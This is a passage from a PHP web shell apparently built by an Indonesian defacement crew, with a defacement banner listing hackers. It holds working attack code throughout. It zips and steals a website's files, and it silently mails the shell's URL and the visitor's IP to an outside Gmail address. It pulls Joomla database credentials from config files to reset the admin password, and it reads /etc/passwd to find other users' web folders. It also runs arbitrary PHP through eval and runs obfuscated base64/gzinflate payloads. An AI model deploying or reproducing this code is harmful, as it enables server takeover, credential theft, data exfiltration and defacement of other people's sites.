3028 $verificate++; show($verificate, 0, 0, 'verified', 1);
3029 if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
3030 else{
3031 show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
3032 show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
3033 }
3034
3035}
3036}
3037?>
3038<?php
3039if(isset($_GET['x']) && ($_GET['x'] == 'maling')){ ?>
3040<form action="?y=<?php echo $pwd; ?>&x=maling" method="post">
3041<form method="post" action="" enctype="multipart/form-data">
3042<input type=text name=sites size=40></nobr><br>
3043<input type="submit" name="go" value="Colong!" style="margin: 5px auto; hight: 25px; width: 100px;">
3044</form>
3045<?php
3046$site = explode("\r\n", $_POST['sites']);
3047$go = $_POST['go'];
3048if($go) {
3049foreach($site as $sites) {
3050@session_start();
3051@error_reporting(0);
3052@ini_set('error_log',NULL);
3053@ini_set('log_errors',0);
3054@ini_set('max_execution_time',0);
3055@ini_set('display_errors', 0);
3056@set_time_limit(0);
3057$folder="$sites";
3058$output="hasil-maling.zip";
3059$zip = new ZipArchive();
3060
3061if ($zip->open($output, ZIPARCHIVE::CREATE) !== TRUE) {
3062 die ("Unable to open Archirve");
3063}
3064
3065$all= new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
3066
3067foreach ($all as $f=>$value) {
3068 $zip->addFile(realpath($f), $f) or die ("ERROR: Unable to add file: $f");
3069}
3070$zip->close();
3071echo "Selamat Anda Berhasil Mencuri Data Website ";
3072}
3073}
3074}
3075?>
3076<?php
3077@ini_set('output_buffering', 0);
3078@ini_set('display_errors', 0);
3079set_time_limit(0);
3080ini_set('memory_limit', '64M');
3081header('Content-Type: text/html; charset=UTF-8');
3082$tujuanmail = 'aghacker@gmail.com';
3083$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
3084$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
3085mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
3086?>
3087<?php
3088if(isset($_GET['x']) && ($_GET['x'] == 'about'))
3089 {
3090 ?>
3091 <form action="?y=<?php echo $pwd; ?>&x=about" method="post">
3092 <html>
3093<head>
3094
3095<title>-+ Hacked By Para Jones +-</title>
3096<link href='http://fonts.googleapis.com/css?family=Fauna+One' rel='stylesheet' type='text/css'>
3097<link rel='shortcut icon' href='http://hunter.ozha-shop.com/MY.jpg'></link>
3098<meta http-equiv='Content-Type' content='text/html; charset=utf-8'/>
3099<meta name='keywords' content='kefiex404'>
3100<meta HTTP-EQUIV='Content-Type' content='text/html; charset=iso-8859-1'/>
3101<meta name='description' content='kefiex404'>
3102<meta content='hacked' name='description'/>
3103<meta content='go.id,defacer,hacked,hacker,news,idbte4m,never die' name='keywords'/>
3104<meta content='INDEX, FOLLOW' name='ROBOTS'/>
3105<meta content='omahunduh.com' name='author'/>
3106<body bgcolor='#000' marginwidth='0' marginheight='0' style='background: black no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size:cover;' onload='(function(a){window.CloudFlare && window.CloudFlare.push(function(b){b(["cloudflare/rocket"],function(c){c.push(function(){(function(){type_text()}).call(a)})})})})(this);' bottommargin='0' rightmargin='0' leftmargin='0' topmargin='0'>
3107<style>body{font-family:'courier new';font-size:80%;color:#28FE14;}.xBody{width:660px;height:450px;position:absolute;z-index:9;}.ssh{display:none;z-index:9;}.sshBox{height:300px;border:4px solid white;-moz-border-radius:4px;-webkit-border-radius:4px;-o-border-radius:4x;-khtml-border-radius:4px;border-radius:4px;z-index:9;}.sshHead{margin-bottom:5px;color:black;font-weight:bold;background-color:white;height:20px;z-index:9;}.greenBox{padding-left:3px;position:absolute;height:22px;border:1px solid #28FE14;z-index:9;}.picz{position:absolute;width:500px;height:80%;display:none;right:2px;top:2px;}#mg img:hover{-webkit-animation:tremer 0.5s linear infinite;-moz-animation:tremer 0.5s linear infinite;-o-animation:tremer 0.5s linear infinite;animation:tremer 0.5s linear infinite;}.neon{<!--coleur lootz--> color:blue;text-shadow:0 0 5px red,0 0 10px red,0 0 30px orange,0 0 45px yellow,0 0 60px red;}.like{border:4px double yellow;box-shadow:0px 2px 20px white;border-radius:10px;padding:9px;height:310px;}#mg img{border:4px double yellow;border-radius:10px;opacity:0.75;-moz-opacity:0.75;filter:alpha(opacity=75);}</style>
3108</head>
3109<body bgcolor='black'>
3110
3111<center>
3112
3113<body onselectstart='return false' ondragstart='return false' oncontextmenu='return false' onLoad='(function(a){window.CloudFlare && window.CloudFlare.push(function(b){b(["cloudflare/rocket"],function(c){c.push(function(){(function(){writetext()}).call(a)})})})})(this);'>
3114<center>
3115<font face='iceland' color='red'>
3116<center>
3117<div id='mg'>
3118<center><a title='KEFIEX404'> <p class='style5'><div align='center'><table width='100%'border='0 '><tr><td align='left'><img src='http://zonehmirrors.org/defaced/2016/11/11/alignlifewauwatosa.com/kefiex.yu.tl/files/bnx.png' height='150' width='250'/ </td><br />
3119<td align='center'> <img src='http://omahunduh.com/omahunduh.com.jpg' alt='Omah Unduh' height='150' width='250'></td><br />
3120<td align='right'><img src='http://kerinci.kemenag.go.id//wp-content//uploads//files//guest//87.php.jpg' height='150' width='250'/ ></td></tr></table></
3121</div></p></center>
3122<br>
3123
3124<td width='90%'><font color='aqua' size='4'>
3125-=| WE NOT ONLY TE4M BUT WE ARE FAMILY |=-<br>
3126<br><td width='90%'><font color='aqua' size='4'>
3127DEFACER TERSAKITI TEAM | HACKER SAKIT HATI | PASUKAN BERANI MATI | BOCAH NEWBIE | MADLEETS <br> IDCA | CIREBON CYBER TEAM | MALANG CYBER ARMY | BALIKITA TEAM | SANJUNGAN JIWA <br> KONTOL MIBER | JEMBUT NGRIWUL | PEJUH MUNCRAT | DADI ANAK
3128<BR><br>
3129<font color='red'>-= WE ARE THE TROUBLE MAKER =- </font><br>
3130<marquee><code><font color='blue' face='consolas' size='4'>
3131<p align='left' class='style2'><font face='Trajan Pro' size='4' color='RED' style='text-shadow: 2px 0px .2em aqua, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'>
3132~ ./KEFIEX404 ~ MANIAK KASUR ~ MR.K ~ EL-RO ~ ANTONIO HsH ~ TUAN GALAU ~ DEDEMIT ID ~ NO SCRIPT 404 ~ K3C0T ~ SIM0D ~ Anton Kill ~ LITLE H4XORZ ~ ANDRIF PZF ~ Syntax-Error ~ FadliDotID_007 ~ SANEKALA ~ YUDHI DM ~ TUSBOLLED~ ALL INDOXPLOIT CREW ~ SHOR7CUT ~ GRETZ IDBTE4M ~ GOENK TEA ~ ./HDV ~ ADRIAN XDA ~ DIDOT ~ POETRA D`M ~ JACK D`RIPPER ~
3133 DAY IDBTE4M ~ DIMAZ BN ~ DEMONK ~ KHUNAY ~ MR-AQ ~ HENDRA D`N ~ PETAPA GENIT ~ KODRAT ~ MUZZAM ~ MAULANA ~ SIRIN ~ ~ X-Wu7z ~ Tuan_galau ~ GrenXPaRTa ~ x'1n73ct ~ m@db100d ~ Hacker Sakit Hati ~ ./$amndan404 ~ ./wi.na ~ Neneng Juhairiah ~ Mr_Oxygen ~ ./coco ~ H3ri.ID ~ Ice Cream ~ newbie patah hati ~ Naughty_r00tz ~ DarkWireless ~ ./czw_07 ~ ./TanpaNama404 ~ xCut10n ~ Kucing Galau ~ ./anjirGBX ~ Dicky Injector ~ jepry_vuln ~ Shut_Down404 ~ Mr.404_NotFound ~ Mr.LittleHaxor ~ Mr.Ghostteror_404 ~ Mr.Dork ~ Mr.aji.192 ~ L4W_CyberDKSH404.Not_Found ~ ozlok ~ Bloc_Anon/404 ~ R3DD3V1L ~ mr.cookie_302 ~ @HF404_
3134~ S4bun ~ WokTampan ~ Ozi L0calhost ~ isal dot id ~ pys404 ~ tomhawk ~ Localhost ~ Dhammashoka1337 ~ Dreamless ~ Ambara Cyber Army ~ CarLi ~ /AwKarin ~ ./Kandani ~ s4bun ~ ./BlaDDzeRR ~ bL@cKID ~ Mr.Vendetta_404 ~ ./Kandasx1337 ~ ./94nt3n9 ~ SkumFuk-45 ~ LukeWalker ~ R1W1l 3PR1W4R3 ~ AND YOU ~ </font></code></marquee>
3135<br>
3136<strong>-+ IDBTE4M AREA GALAU RAMARIMARI +-</strong>
3137</td>
3138</center>
3139<br> <br></span></div>
3140
3141<iframe width='0%' height='0' src='https://cf-media.sndcdn.com/3wW39mx0grIP.128.mp3?Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiKjovL2NmLW1lZGlhLnNuZGNkbi5jb20vM3dXMzlteDBncklQLjEyOC5tcDMiLCJDb25kaXRpb24iOnsiRGF0ZUxlc3NUaGFuIjp7IkFXUzpFcG9jaFRpbWUiOjE0ODU1MTI5OTR9fX1dfQ__&Signature=kWxSIqms70Xwt0eHS2Fs9AgX2k3vwI-AKuFj2FN0KprNT4yVvumb2s7taYzOkEC0sac00kAZGSrYSfxBe0yo3rQarEts2SlTs2BmiYpSLfpW-ZF4xDT3VoLl9Vb9CriORNk37e-pO~tgGHe6VJZs3hrNGv00IkBeiCNt~U5r~V7YfKTDFRBv8TGrdJ~YtHLV0uLmmDuZ~arzVQqNM0Jm1QZtLzpZ8CFd9CRNms3WjhuVbdRtgS25fC0BgaWk74WvLMVJWmibrNiksPugnqNM~-re-MzM8HFDH9WqDmf3rfLmc1v2vxSP6Dj6LqnqU15oHUPdHnoI-XxJiYOcFJT-JA__&Key-Pair-Id=APKAJAGZ7VMH2PFPW6UQ' frameborder='0'></iframe>
3142
3143<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
3144
3145<script type='text/javascript'>
3146/* <![CDATA[ */
3147var _gaq = _gaq || [];
3148_gaq.push(['_setAccount', 'UA-5341948-14']);
3149_gaq.push(['_trackPageview']);
3150
3151(function() {
3152var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
3153ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
3154var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
3155})();
3156
3157(function(b){(function(a){'__CF'in b&&'DJS'in b.__CF?b.__CF.DJS.push(a):'addEventListener'in b?b.addEventListener('load',a,!1):b.attachEvent('onload',a)})(function(){'FB'in b&&'Event'in FB&&'subscribe'in FB.Event&&(FB.Event.subscribe('edge.create',function(a){_gaq.push(['_trackSocial','facebook','like',a])}),FB.Event.subscribe('edge.remove',function(a){_gaq.push(['_trackSocial','facebook','unlike',a])}),FB.Event.subscribe('message.send',function(a){_gaq.push(['_trackSocial','facebook','send',a])}));'twttr'in b&&'events'in twttr&&'bind'in twttr.events&&twttr.events.bind('tweet',function(a){if(a){var b;if(a.target&&a.target.nodeName=='IFRAME')a:{if(a=a.target.src){a=a.split('#')[0].match(/[^?=&]+=([^&]*)?/g);b=0;for(var c;c=a[b];++b)if(c.indexOf('url')===0){b=unescape(c.split('=')[1]);break a}}b=void 0}_gaq.push(['_trackSocial','twitter','tweet',b])}})})})(window);
3158/* ]]> */
3159</script>
3160<?php
3161}
3162//////////////////////////////////////////////////////////////////////////////
3163
3164?>
3165<?php
3166if (isset($_GET['idb']) && ($_GET['idb'] == 'jomla')) {
3167?>
3168<form action="?&idb=jomla" method="post">
3169<?php
3170error_reporting(0);
3171 if($_POST){
3172
3173 function jipukteks($param, $kata1, $kata2){
3174 if(strpos($param, $kata1) === FALSE) return FALSE;
3175 if(strpos($param, $kata2) === FALSE) return FALSE;
3176 $start = strpos($param, $kata1) + strlen($kata1);
3177 $end = strpos($param, $kata2, $start);
3178 $return = substr($param, $start, $end - $start);
3179 return $return;
3180}
3181
3182 function anucurl($sites){
3183 $ch1 = curl_init ("$sites");
3184curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
3185curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
3186curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3187curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
3188curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
3189curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
3190curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
3191curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
3192$data = curl_exec ($ch1);
3193return $data;
3194 }
3195
3196function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
3197 $post2 = array(
3198 "username" => "$fak1",
3199 "passwd" => "$fak2",
3200 "lang" => "en-GB",
3201 "option" => "com_login",
3202 "task" => "login",
3203 "return" => "$fak3",
3204 "$fak4" => "1",
3205
3206 );
3207$ch = curl_init ("$cek");
3208curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3209curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3210curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3211curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
3212curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3213curl_setopt ($ch, CURLOPT_POST, 1);
3214curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
3215curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3216curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3217$data6 = curl_exec ($ch);
3218return $data6;
3219 }
3220
3221 $link = $_POST['link'];
3222 if($link==""){
3223 echo "Report: <br>";
3224 echo "-> Link Config anda belum terisi <-";
3225 }
3226 else{
3227
3228 $file = anucurl($link);
3229
3230 $host = jipukteks($file,"smtphost = '","'");
3231 $username = jipukteks($file,"user = '","'");
3232 $password = jipukteks($file,"password = '","'");
3233 $db = jipukteks($file,"db = '","'");
3234 $dbprefix = jipukteks($file,"dbprefix = '","'");
3235 $user_baru = "admin";
3236 $password_baru = "kefiex";
3237 $prefix = $dbprefix."users";
3238 $pass = md5("$password_baru");
3239 $serah = $db.".".$dbprefix;
3240
3241
3242 echo "<font color='#C6C646'>Database Content :</font><br>";
3243 echo "Db Host          : <font color='green'>$host</font><br>";
3244 echo "Db user           : <font color='green'>$username</font><br>";
3245 echo "Db Password  : <font color='green'>$password</font><br>";
3246 echo "Db name         : <font color='green'>$db</font><br>";
3247 echo "Table_Prefix   : <font color='green'>$dbprefix</font><br>";
3248
3249 mysql_connect($host,$username,$password) or die("<br><font color='red'>Gagal Terkoneksi Ke Database ...</font>");
3250 mysql_select_db($db) or die("<font color='red'>Database tidak bisa dibuka ...</font>");
3251
3252 $show=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3253 $r=mysql_fetch_array($show);
3254 $id = $r[id];
3255
3256 mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
3257$utama = "$link";
3258$kedua = @file_get_contents($utama);
3259if(preg_match("askdasldasdlja12123",$kedua)){
3260 echo "# <font color='green'>berhasil rubah password</font><br>";
3261 echo "# $utama<br>";
3262
3263 }
3264 else{
3265 echo "<br># <font color='green'>Pasword berhasil dirubah: </font><br>";
3266 echo "Username: <font color='#C6C646'>$user_baru</font><br>";
3267 echo "Password: <font color='#C6C646'>$password_baru</font><br>";
3268
3269
3270 }
3271 }
3272
3273
3274
3275
3276 }else{
3277 echo '<html>
3278 <body>
3279 <center>
3280 <center><br><span style="font-size:1.6em;"> .: Joomla Password Reset | Tools :. </span><br>Coded by Bl4ckcod37</center><br>
3281 <table>
3282 <tr><td><form method="post"></td></tr>
3283 <tr><td><input class="inputz" size=50 type="text" name="link" placeholder="masukkan link config disini"></td></tr>
3284
3285 <tr><td>                                                 <input
3286class="inputz" type="submit" value="Reset"></td></tr>
3287 </form>
3288 </table>
3289
3290 </center>
3291
3292 </body>
3293</html><br><br><br><br>';
3294 }
3295}
3296 ?>
3297<?php
3298if (isset($_GET['idb']) && ($_GET['idb'] == 'sken')) {
3299set_time_limit(0);
3300
3301($x0b = ini_get('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');
3302
3303@$x0c = fopen('/etc/passwd','r');
3304
3305if (!$x0c) { die('<b> RAIMU ELEK WKWKWKWK :v </b>'); }
3306
3307// $x0d = array();
3308// $x0e = array();
3309// $x0f = array();
3310// $x10 = 0;
3311
3312while(!feof($x0c)){
3313 // baca baris...
3314 // $x11 = fgets($x0c);
3315 // if ($x10 < 35){
3316 while($x11 = fgets($x0c)){
3317
3318 $x12 = strpos($x11,':');
3319
3320 $x13 = substr($x11,0,$x12);
3321
3322
3323 $x14 = '/home/'.$x13.'/public_html';
3324 if (($x13 != '')){
3325
3326 if (is_readable($x14)){
3327
3328 echo "<font face=Verdana size=2 color=#c000ff>Hajar Boss => $x14</font>";
3329 echo "<br/>";
3330 }
3331 }
3332 }
3333 // $x10++;
3334 }
3335}
3336?>
3337 </div></div></div></div></div></div>
3338<?php
3339 if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
3340 <form action="?y=<?php echo $pwd; ?>&x=php" method="post">
3341 <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); }
3342 else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea>
3343 <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form>
3344 <?php } elseif(isset($_GET['idb']) && ($_GET['idb'] == 'sql')){
3345 if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
3346 $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
3347 if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
3348 $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
3349 $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\">[ databases ]</a>"; if(isset($_GET['db']))
3350 $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
3351 if(isset($_GET['table'])) $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
3352 $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
3353 $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
3354 $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
3355 $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
3356 $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables);
3357 foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; }
3358 elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array();
3359 $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z']))
3360 $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
3361 if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
3362 for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){
3363 if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) {
3364 if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
3365 $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?>
3366 <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
3367 <input type="hidden" name="x" value="mysql" />
3368 <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
3369 <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
3370 <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
3371 <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
3372 <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form>
3373 <?php }}
3374 elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
3375 elseif(isset($_GET['idb']) && ($_GET['idb'] == 'jump')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; }
3376 elseif(isset($_GET['idb']) && ($_GET['idb'] == 'wpp')){ @eval(gzinflate(base64_decode($wpress))); "</div>"; }
3377
3378 elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" 